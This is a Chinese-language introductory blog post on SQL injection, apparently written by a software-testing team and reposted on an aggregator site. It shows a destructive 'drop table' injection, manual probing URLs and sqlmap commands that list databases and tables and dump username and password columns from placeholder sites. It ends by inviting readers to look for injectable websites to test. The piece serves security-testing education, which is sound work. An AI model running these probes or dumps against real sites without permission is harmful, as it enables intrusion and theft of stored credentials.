SQL注入小记
Posted 搜狗测试
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入小记相关的知识,希望对你有一定的参考价值。
背景
之前在测试培训时,简要提到了安全测试,于是以此为起点,就去了解了一些安全测试相关的内容。sql注入便是其中的一部分。
简介
SQL 注入是一种专门针对SQL语句的攻击方式。通过把SQL命令插入到web表单提交、输入域名或者页面请求的查询字符串中,利用现有的程序,来非法获取后台的数据库中的信息。在web的测试中涉及到的会比较多些。
注入原理
存在注入的原因是后台在编写程序时,没有对用户输入的数据做过滤。
例:
1. 用户在某个输入框提交的参数是123
浏览器提交的URL为: http://www.xxx.com/index.php?id=123
服务器后台执行SQL语句:select * from table1 where id = 123
此时是没有任何影响的。
2. 如果用户提交的参数是 123;drop table
服务器后台执行SQL语句: select * from table1 where id =123 ; drop table
相当于后台执行了两条SQL语句,查表,并且把table删除, 从而导致了SQL注入。
检测注入的方法
目前主要有两种检测方式:
手工注入检测流程:
1. 判断是否存在注入点
www.abc.com/index.php?id=2'
www.abc.com/index.php?id=2 and 1=1
www.abc.com/index.php?id=2 and 1=2
第2条返回正常,第1,3条返回不正常说明id参数存在注入漏洞
2. 判定是否存在admin表
www.abc.com/index.php?id=2 and exists(select * from admin)
返回正常,存在admin表
3. 猜admin表中的字段名
www.abc.com/index.php?id=2 and exists(select username from admin)
返回正常 表示admin表存在username字段
4. 检测其他sql操作
工具检测:
sqlmap: sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
https://github.com/sqlmapproject/sqlmap.git
2. 常用命令
1) sqlmap.py -u "http://www.abc.com/index.asp?id=1"
判断id参数是否存在注入:
若存在注入,尝试执行下面的步骤
2) sqlmap.py -u "http://www.abc.com/index.asp?id=1" --dbs
列举能列出的所有数据库名
3) sqlmap.py -u "http://www.abc.com/index.asp?id=1" --current-db
列出当前使用的数据库名,假设列出“sqltest”数据库
4) sqlmap.py -u "http://www.abc.com/index.asp?id=1" --is-dba
判断该注入点是否有管理员权限:返回true 表示是管理员
5) sqlmap.py -u "http://www.abc.com/index.asp?id=1" -D "sqltest" --tables
获取sqltest中的所有表
6) sqlmap.py -u "http://www.abc.com/index.asp?id=1" -D "sqltest" -T "admin" --columns
假设有"admin"表, 列举表admin的字段(列名),假设存在"username","password"字段
7) sqlmap.py -u "http://www.abc.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump
下载字段username,password的值,
测试
以一个sqlmap检测URL为例:
1. 检测过程:
2. 检测结果:
可知该次注入检测没有成功。感兴趣的小伙伴可以寻找可注入的网址进行测试,更深入的内容还需要进行更多的探索。
搜狗测试QQ粉丝群:459645679
以上是关于SQL注入小记的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段